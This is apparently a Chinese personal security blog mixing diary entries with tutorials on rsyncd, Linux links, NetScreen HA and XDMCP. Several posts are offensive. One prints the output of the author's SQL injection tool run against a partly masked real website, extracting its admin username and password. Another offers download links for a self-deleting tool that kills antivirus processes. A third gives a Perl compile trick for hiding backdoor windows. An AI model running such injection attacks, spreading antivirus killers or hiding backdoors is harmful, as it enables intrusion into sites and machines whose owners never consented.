You may say I am a dreamer,
But I am not the only one,
I hope someday you will join us,
And the world will live as one.
订阅数:131648几百年前大虾们就将这东西玩得滚瓜烂熟了,偶现在才玩,郁闷,还是才到能跑的份上,惭愧,在:
http://demonalex.3322.org/honeyd/honeyd.doc
希望各位大虾指导一下:)
12月23日,昨天,是个不错的日子,老地方~~~本次聚会的成员,来自‘五湖四海’(不同的公司,不同的职业,甲方,乙方。。。),但却因为存在相同的爱好而聚在一起(PS:想想8个月前,只有三个人,现在。。。),感怀一下,纪念一下:)
磁力今天要考试,但还是‘上台’讲了两句,谢谢他给大家分享了他对开锁这门“艺术”的理解,也希望他公开一下他的资料。。。(开锁的资料,还有就是那个“会死机的”屏保)。。。:D
BAN和QQ这两天都在指导我如何‘挂马’,谢谢他们了:P;另外啊BAN的“0DAY”我放在QQ群的共享里了:P
同事QQ是个大忙人,居然也抽出时候过来,谢谢他,希望他的新网站越办越火。。。
黄工第一次参加,却给了大家(包括聚会的事宜)不少有建设性的提议,同时感谢他毫无保留地提供专业的技术意见,非常感谢(第一次花‘甲方’的钱,真是过意不去啊。。。=_=b)
老同事启明是聚会的老同志了,谢谢他一直以来的支持,并提供了不少新的技术作参考(CHECKPOINT的安装文档能共享一下就更好了:P),这个就不用多说了:P
简工是第一次来参加聚会吧,希望他能继续支持我们的聚会:)
我的NASL分析还没讲完,惭愧,美中不足。。。检讨一下。。。:(
最后,大道理就没有,还是我和磁力最喜欢的那句:Any thing is HACKING....:)
1)
[root@alex5 root]# ln ./monitor.sh ./aaa.sh
[root@alex5 root]# ls -il monitor.sh
518856 -rwxr-xr-x 2 root root 88 Aug 17 16:08 monitor.sh
[root@alex5 root]# ls -il aaa.sh
518856 -rwxr-xr-x 2 root root 88 Aug 17 16:08 aaa.sh
[root@alex5 root]# ln -s ./monitor.sh ./bbb.sh
[root@alex5 root]# ls -il bbb.sh
519758 lrwxrwxrwx 1 root root 12 Dec 17 02:20 bbb.sh -> ./monitor.sh
[root@alex5 root]# ls -il aaa.sh
518856 -rwxr-xr-x 2 root root 88 Aug 17 16:08 aaa.sh
[root@alex5 root]# ls -il monitor.sh
518856 -rwxr-xr-x 2 root root 88 Aug 17 16:08 monitor.sh
[root@alex5 root]# du -sh bbb.sh
0 bbb.sh
[root@alex5 root]# du -sh aaa.sh
4.0K aaa.sh
[root@alex5 root]# du -sh monitor.sh
4.0K monitor.sh
[root@alex5 root]# file aaa.sh
aaa.sh: Bourne shell script text executable
2)
[root@alex5 root]# ln ./var ./kkk
ln: `./var': hard link not allowed for directory
[root@alex5 root]# ln -s ./var ./kkk
[root@alex5 root]# file ./kkk
./kkk: symbolic link to `./var'
总结:软链接与硬链接都是与原体同步的。软链接可以通过类型符“l”看出来,但硬链接就不可以,只能通过ls -il的inode值相同看出来,而且硬链接的文件与原体大小相同,软链接则不然(由此可见,软链接真的只是个快捷方式)。另外,目录只能用软链接,不能用硬链接。OVER...
[操作文]利用rsyncd做文件共享服务器
writer: demonalex[at]dark2s[dot]org
参考资料:
吴鲁加先生在2001年写的《用rsync对网站进行镜像备份》一文
(http://fanqiang.chinaunix.net/app/rsync/2001-09-08/2729.shtml)
rsyncd.conf配置文件的官方说明文档
(http://samba.anu.edu.au/ftp/rsync/rsyncd.conf.html)
测试环境:
服务端:
RedHat Fedora 2
(Linux alex5 2.6.5-1.358 #1 Sat May 8 09:04:50 EDT 2004 i686 i686 i386 GNU/Linux)
客户端:
WIN2003 + cwrsync2.0.8
安装配置rsyncd:
[root@alex5 root]# cd /usr/local/sbin
[root@alex5 sbin]# wget http://samba.anu.edu.au/ftp/rsync/rsync-2.6.9.tar.gz
[root@alex5 sbin]# tar -zxvf rsync-2.6.9.tar.gz
[root@alex5 sbin]# cd rsync-2.6.9
[root@alex5 rsync-2.6.9]# ./configure && make && make install
安装过程完成,执行程序在/usr/local/bin/rsync,主配置文件的路径为/etc/rsyncd.conf,默认这个
主配置文件是不存在的,若要启动rsyncd服务的话就需要手工新建这个文件了:
[root@alex5 rsync-2.6.9]# vi /etc/rsyncd.conf
--------------------------------------
uid = nobody #进程宿主UID
gid = nobody #进程宿主GID
max connections = 4 #最大连接数
use chroot = no #不使用CHROOT
log file = /var/log/rsyncd.log #日志文件
pid file = /var/run/rsyncd.pid #PID文件
lock file = /var/run/rsyncd.lock #这个LOCK文件用于上面的max connections
secrets file = /etc/rsyncd.pwd #帐号文件
[share] #第一个虚拟目录,它是匿名的,没有auth users参数
path = /share #映射的实际目录
comment = Surprise Here!!! #注释
ignore errors #忽略错误
read only = no #设置此虚拟可写
list = yes #允许LIST
[secret] #一个需要认证的虚拟目录,允许访问的用户是hacker
path = /secret #映射的实际目录
comment = Do not want to watch!!! #注释
ignore errors #忽略错误
read only = no #设置此虚拟可写
list = yes #允许LIST
auth users = hacker #此虚拟目录的认证访问用户为hacker
--------------------------------------
[Esc]+ZZ
[root@alex5 rsync-2.6.9]# vi /etc/rsyncd.pwd
++++++++++++++++++++++++++++++++++++++
hacker:xxxxxx
++++++++++++++++++++++++++++++++++++++
[Esc]+ZZ
hacker是帐号,xxxxxx是密码。
[root@alex5 rsync-2.6.9]# chmod 600 /etc/rsyncd.pwd
配置过程完成,启动rsyncd:
[root@alex5 rsync-2.6.9]# /usr/local/bin/rsync --daemon
启动后我们可以通过netstat发现rsyncd:
[root@alex5 rsync-2.6.9]# netstat -antep|grep rsync
tcp 0 0 0.0.0.0:873 0.0.0.0:* LISTEN 0 50043 31978/rsync
在/etc/services中我们修改rsyncd使用的传输层端口,默认是TCP873。最后把‘程序启动’写入预处理:
[root@alex5 rsync-2.6.9]# echo /usr/local/bin/rsync --daemon>>/etc/rc.d/rc.local
客户端操作:
首先说说WIN32下的操作,MS WINDOWS默认没有rsync客户端,需要另外安装,程序名为cwrsync,是个
在cygwin下编译的rsync(我放在:http://demonalex.3322.org/download/nix/rsync/cwRsync_2.0.8_
Installer.zip),解压安装后:
2006-12-10 17:13 <DIR> .
2006-12-10 17:13 <DIR> ..
2006-12-10 17:13 <DIR> bin
2006-03-13 17:57 1,941 cwrsync.cmd
2006-12-10 17:13 <DIR> doc
2006-04-24 05:36 34,287 license.txt
2006-12-10 17:13 44,048 uninstall.exe
所有执行程序都在bin目录下,我们只需要用到rsync.exe这个程序就可以了,最后记得把bin这个目录
加入PATH环境变量。
LIST远程rsyncd服务上的文件/目录是很简单的,例子-查看(LIST)share与secret目录:
***************************************
C:\>rsync rsync://demonalex.3322.org
share Surprise Here!!!
secret Do not want to watch!!!
C:\>rsync rsync://demonalex.3322.org/share
drwxrwxrwx 4096 2006/12/10 20:11:53 .
-rwxrwxrwx 733222912 2006/09/12 12:46:40 UFC.Ultimate.Knockouts.Combo.Xvid.Dvd
rip.CD2.avi
-rwx------ 811841 2006/12/10 17:40:12 rsync-2.6.9.tar.gz
-rwx------ 33386 2006/12/10 19:10:45 rsyncd.conf.html
C:\>rsync rsync://hacker@demonalex.3322.org/secret
Password:
drwxrwxrwx 4096 2006/12/10 18:42:13 .
***************************************
rsync的文件传输机制是:
rsync 源对象 目标对象
例子-上传与下载aaa.txt:
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
C:\>rsync aaa.txt rsync://demonalex.3322.org/share
C:\>rsync rsync://demonalex.3322.org/share
drwxrwxrwx 4096 2006/12/11 02:32:40 .
-rwxrwxrwx 733222912 2006/09/12 12:46:40 UFC.Ultimate.Knockouts.Combo.Xvid.Dvd
rip.CD2.avi
-rwx------ 3 2006/12/11 02:32:40 aaa.txt
-rwx------ 811841 2006/12/10 17:40:12 rsync-2.6.9.tar.gz
-rwx------ 33386 2006/12/10 19:10:45 rsyncd.conf.html
C:\>f:
F:\>dir/w aaa.txt
驱动器 F 中的卷是 BACKUP
卷的序列号是 BC13-5202
F:\ 的目录
找不到文件
F:\>rsync rsync://demonalex.3322.org/share/aaa.txt /
F:\>dir aaa.txt
驱动器 F 中的卷是 BACKUP
卷的序列号是 BC13-5202
F:\ 的目录
2006-12-11 02:17 3 aaa.txt
1 个文件 3 字节
0 个目录 9,771,294,720 可用字节
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
客户端若是在*NIX系统的话,直接使用rsync这个程序就可以了,操作同上。
小经验:
当出现下面的情况:
[root@alex5 /]# rsync rsync://root@127.0.0.1/root
Password:
rsync: link_stat "." (in root) failed: Permission denied (13)
rsync error: some files could not be transferred (code 23) at main.c(1385) [receiver=2.6.9]
据说原因可能有多种,但我测试过,出现这样问题的原因是我要同步的这个root目录在掩位的最后一位
不是r-x或以上的权限,也就是说root这个目录一定要等于或大于drwxr-xr-x才能玩同步。
上周呆在佛山做服务,结果惹上了病回来(不是XING病哦),泻死偶了。。。下周一还要去。。。
下周3-4在广州做个技术培训,又能见到实验室的同事了(很侥幸,上次见到了大名鼎鼎的村长@0x557与中科院博士后梁博士,他们太BT了。。。)。。。
佛山是个不错的地方,老实说,有时我真想常呆那里,客户很好,也很热情:
接头的刘小姐人不错,工作起来的魄力就像女超人一样,还是中大的硕士,偶像。。。何工,安全知识不一般,能和我扯漏洞扫描器扯两个小时的客户。。。文工,什么都不说,他的口头禅:一点技术含量都没有(光看这句就杀死人了。。。)。。。而且佛山是我见过那么多个地市里对NETSCREEN防火墙那么熟悉的地市(他们的防火墙割接都是自己做,牛。。。)。。。下周再去‘会会’他们吧:)
两天前在客户那里演示SQL注入,其中有位“扫描器爱好者”向我提到是否能使用PROXY,其实Acunetix Web Vulnerability Scanner这样的大软件一早就就有这功能了(不过nsfocus的极光与venus的天镜都是没这功能的。。。感觉上这功能应该是会HAX0R准备的吧?!),所以我就加了这组件上我的“get”里,使用者可以选择使用PROXY或否,新版本号1.9,源码结构没大变化,只是加了个组件的方法而已。。。希望有用处,下载地址:
http://demonalex.3322.org/get1_9.rar
一直有朋友问我PERL程序如何在运行时不显示CMD窗体,其实这种应用只不过是为了满足大家用PERL写后门或是其他什么东西时不会弹出个奇怪的CMD窗体而已。。。我一直都认为这能在PERL解释器加载项又或是程序调用中解决这问题,直到最近要调试“黄老太”时才开始考虑这问题,最后找到的解决方案是在perlapp程序编译时解决的,例如我现在写个删除c:\ccc.txt的程序:
#!/bin/perl -w
use Win32::FileOp;
Win32::FileOp->Delete("c:\ccc.txt");
exit 1;
默认的话会跳出个CMD(闪一下吧。。。),我把这个文件保存在c:\test.pl,用perlapp编译,格式:
C:\>perlapp -f --gui test.pl
PerlApp 6.0.2 build 203380
Copyright (C) 1998-2005 ActiveState Corp. All rights reserved.
ActiveState is a division of Sophos Plc.
Commercial license for demonalex <demonalex@gzpia.com>
Created 'test.exe'
现在我们在“开始”-》“运行”下输入“c:\test.exe”,回车,嘿嘿,现在屁都不会放一个了,在看看我们原来存在c:\ccc.txt还在不在?:P
今日为广州电信的骨干机房上两台公司的IDS设备,过程中出现了些问题(可能是我水平不够的原因),于是接二连三地给北京研发打了N个电话(估计不下20个),结果最后我只能在他们的言语中FEEL他们对我的“不满”,可惜不能FACE TO FACE地“联络”一下感情,估计已经是被“讨厌”了,甚至放进了黑名单之列。。。无它的,我的准备不够吧。。。
另外前天的聚会上与磁力、啊BAN讨论了一下,觉得是否将“黄老太”的思路‘逆向’一下,改为能透过网络传播的杀病毒工具。。。其实以前也有这样的先例,只是目前有些病毒太猖狂了。。。:P
下个星期部门组织到杭州去内部培训(其实玩的成分更多一些),但可惜偶又要在周末参加学校的期末考,没机会了,只能等下一次吧。。。不能面见北京分部的达人,尤觉得可惜。。。
另外,最近在网上发现了有同志为偶的烂页做了个镜像,谢谢他,地址在:http://www.4lu.cn/demonalex/
黄老太v1.8
1)使用了底层的KILL接口(用哪个API就不说了:P)
2)有自杀功能,运行后自动删除自身
3)目前只支持NT及以上版本
4)只支持杀KV-江民。。。
5)速度还是慢。。。
下载:
http://www.i170.com/attach/515E5176-2B6A-4457-B76D-2E4D332B89FF
最后,发现查/杀毒软件是很顽固的。。。有时还杀不了(正常是能杀的)。。。有待考究。。。
最近买了本《黑客X档案》(2006年11月刊)回来看,看到了个关于可以在内存里“杀死”杀毒软件的工具---TechKiller(http://www.77169.org/Soft/HTML/17518.html),正好客户也向我问起这类型的东西。。。虽然思路已经很久了,但没有实施过,所以最近写了个模拟的东西出来,取名“黄老太”(因为写时觉得‘她’的工作原理有点像大超市---“百佳”很久以前的代言人“黄老太”有点相似),目前功能还很弱:
1)只能杀KV--江民的杀毒软件
2)速度比较慢[PS:还没优化。。。]
3)杀进程时还沿用WINNT的ntsd程序[PS:还没有空找底层接口做‘杀’进程],所以杀进程时大家可能会看到个窗口一闪而过。。。
因此有待优化,下面付上“黄老太”---hlt.exe version 1.0
http://www.i170.com/attach/5C548FD3-FCB9-4629-B6EF-3156A23F761D
不知道,不清楚。。。上周黑白颠倒,不知道多少个昼日就到周末。。。
家里的一台UNIX测试机挂了。。。磁力又不过来弄,郁闷。。。。强迫着做些有意义的事,写写东西吧,弄了个所谓的SQL注入测试工具,功能弱到飞起来了。。。刚刚才加了些东西上去,现在的是VERSION 1。2版本,还是什么功能都没有,准备把主要的代码结构都换一下,等成熟了再‘开源’,哈哈:D
最近在做个安全服务的单,费用不大,但还是有点工作量的,公司的扫描器熟了些了,但其他产品还。。。准备为客户订制一个加固的方案。。。但又害怕欠缺周详,今天一定要提起精神才行。。。
下周估计也要给客户做个培训,内容方面公司已经定好了,但允许我自由发挥,这点I LIKE IT~:)
最近私人时间不多,连XY7同志到了广州几天都没时间碰上一面,啊BAN与磁力各有各忙,倒是前些日子因为工作的关系常常见到lqm大大。
唉。。。等待。。。
C:\get>get.exe http://www.hXXXX.com.cn/news/1type.asp?news_id=433
**************************
* CopyRight By DemonAlex *
* demonalex@163.com *
**************************
"http://www.hXXXX.com.cn/news/1type.asp?news_id=433" have SQL Injection.
Now crack the table name...
Table: admin is exists !
Now crack the row name...
Row: user_pass is exists in Table: admin !
Row: user_name is exists in Table: admin !
Now crack length...
Table: admin -- Row: user_pass 's length is 10 !
Table: admin -- Row: user_name 's length is 5 !
Now crack the value...
h is 1 for Table: admin -- Row: user_pass !
a is 2 for Table: admin -- Row: user_pass !
o is 3 for Table: admin -- Row: user_pass !
d is 4 for Table: admin -- Row: user_pass !
i is 5 for Table: admin -- Row: user_pass !
a is 6 for Table: admin -- Row: user_pass !
d is 7 for Table: admin -- Row: user_pass !
m is 8 for Table: admin -- Row: user_pass !
i is 9 for Table: admin -- Row: user_pass !
n is 10 for Table: admin -- Row: user_pass !
a is 1 for Table: admin -- Row: user_name !
d is 2 for Table: admin -- Row: user_name !
m is 3 for Table: admin -- Row: user_name !
i is 4 for Table: admin -- Row: user_name !
n is 5 for Table: admin -- Row: user_name !
Now find the entry...
http://www.hXXXX.com.cn/login.asp is exists !
http://www.hXXXX.com.cn/logout.asp is exists !
http://www.hXXXX.com.cn/news/login.asp is exists !
http://www.hXXXX.com.cn/news/logout.asp is exists !
over.
HA搭建
-----------------------------------------------------------------------------------------------------------------------
[经验文]NS配置HA
writer: demonalex[at]dark2s[dot]org
前言:感谢好朋友成哥、神码许工、同事小黄的指导与帮忙。
两台设备的入口与出口做相同的配置,然后将一个或两个接口做HA的心跳线(用直联线连接,
接口的Zone配置为HA)。说明一下,心跳线用于控制(说明哪个是主设备,哪个是副设备)
与数据同步(所有配置,包括接口、路由、策略、VPN等等),可以使用一个接口/一条心跳
线,也可以使用两个接口/两条心跳线。
配置时有两种方法:
1)首先配置好主HA设备,然后将config文件DOWN下来,修改不同的部分,然后上传上副HA
设备上。
2)配置好主HA设备,然后配置副HA设备的HA组件,最好在副HA设备上执行同步命令(将主H
A的数据拷贝到副HA设备上)。
具体配置:
两台NS204,它们的eth1都连接交换机1,eth2都连接交换机2,eth3互连作HA,eth4互连
作HA。
主HA设备:
set interface ethernet3 zone HA #设置eth3为HA口
set interface ethernet4 zone HA #设置eth4为HA口
set nsrp cluster id 1 #建立一个id为1的nsrp群集
set nsrp rto-mirror sync #设备RTO镜像同步
set nsrp vsd-group id 0 priority 50 #设备本设备的优先级别,级别越低,优先级越高
set nsrp vsd-group id 0 preempt #自动争夺
set nsrp monitor interface ethernet2 #设置监视口-eth2
set nsrp monitor interface ethernet1 #设置监视口-eth1
副HA设备:
set interface ethernet3 zone HA #设置eth3为HA口
set interface ethernet4 zone HA #设置eth4为HA口
set nsrp cluster id 1 #建立一个id为1的nsrp群集
set nsrp rto-mirror sync #设备RTO镜像同步
set nsrp vsd-group id 0 priority 100 #设备本设备的优先级别,级别越高,优先级越低
set nsrp vsd-group id 0 preempt #自动争夺
set nsrp monitor interface ethernet2 #设置监视口-eth2
set nsrp monitor interface ethernet1 #设置监视口-eth1
本例用两个接口做HA(eth3、eth4);NSRP是NETSCREEN的HA专用协议,使用前必须
建立一个NSRP群集;RTO镜像用于主/副设备间切换同步;设置priority(优先级)参数是
为了区分哪一台是主设备,哪一台是副设备--最后的参数值越少,那台机器越优先(是主设
备);设置preempt(争夺)参数是很重要的,打个比方:默认情况下,当主设备掉线后,
副设备会自动切换为备用的‘主’设备,但若此时原来的主设备又正常连通了,备用的‘
主’设备是不会把‘主’权交还给原来的主设备的...若设置了preempt时情况就会相反;最
后需要将正常的通信接口加入到NSRP的‘monitor interface’中。
附属命令:
查看NSRP信息
get nsrp vsd-group all
副设备同步主设备的所有数据
exec nsrp sync global-config save
-----------------------------------------------------------------------------------------------------------------------
VIP NAT
http://www.i170.com/attach/5D96C0D5-66ED-4015-B26A-8350D9444AA6
arp -a后显示多个IP同一MAC地址的可能
1)一张网卡绑定了多个IP地址。使用网卡的‘别名’功能可以绑定多个IP。
2)进行了NAT地址映射处理。使用类似NETSCREEN中的MIP、DIP、VIP都因为
映射的问题将多个IP地址绑定在进行了NAT处理的网卡接口上。
3)进行了ARP欺骗攻击。通过数据链路层缺乏真实性认证的特性进行欺骗从
而达至中间人攻击的可能,这样的攻击应用在二层网络也会导致多个IP对应
同一MAC地址的可能。
LINUX服务端:
vi /etc/X11/xdm/Xaccess
删除#*前的#注释。
vi /etc/X11/gdm/gdm.conf
保证:
[xdmcp]
Enable=true
Port=177
存在。
vi /etc/inittab
保证:
id:5:initdefault
x:5:respawn:/usr/bin/gdm
存在。
vi /etc/X11/xdm/xdm-config
在DisplayManager.requestPort:0前加!符号注释了它。
禁用防火墙服务或添加允许访问UDP177的规则都可以。
重新启动系统。
XMANAGER端:
打开Xbrowser程序,新建一个会话,参数:
XDMCP
Method:Indirect
Host:《输入你的LINUX端IP》
Por Number:177
X Server:Auto Select
Allocate display number automatics
按Finish确认后,对该新生成图标按右键,选择“Open”,完成。
参考文档:
http://www.ccw.com.cn/server/yyjq/htm2005/20050906_0994B.htm
资源:Xmanager 2.0 Enterprise
Powered by Haiwit